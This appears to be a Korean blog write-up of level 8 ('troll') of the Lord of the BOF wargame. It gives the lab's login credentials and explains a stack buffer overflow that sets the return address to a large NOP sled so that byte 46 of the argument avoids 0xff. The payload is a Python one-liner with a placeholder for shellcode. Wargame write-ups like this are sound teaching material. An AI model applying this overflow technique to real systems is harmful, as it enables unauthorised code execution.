CafeM0ca

level8 troll 본문

Hacking/LOB(Red Hat)

level8 troll

M0ca 2017. 9. 14. 01:50
반응형

입장 ID:troll

입장 PW:aspirin


소스코드가 많이 짧아졌다. argv[1][46]이 \xff면 종료된다.

스택이 쌓이게 되면 \xff에서 \x00까지 낮은주소로 향하게 된다.


스택 구조는 아래와 같다.

buffer 40 | SFP 4 | RET 4 

r `python -c 'print "A"*44+"\xaa\xbb\xcc\xbf"+"\x90"*130014'`를 해준 상태에서 esp를 확인해보니 리턴주소로 사용할 NOP의 주소가 \xff가 아니게 된다.


payload

./vampire `python -c 'print "A"*44+"&(argv[1][46]이 \xff가아닌 NOP)+"\x90"*130020"+"쉘코드"'`


다음 ID:vampire

다음 PW:music world


반응형

'Hacking > LOB(Red Hat)' 카테고리의 다른 글

[LOB]level10 skeleton  (0) 2018.01.03
level9 vampire  (0) 2017.09.14
level7 orge  (0) 2017.09.14
level6 darkelf  (0) 2017.09.14
level5 wolfman  (0) 2017.09.14
Comments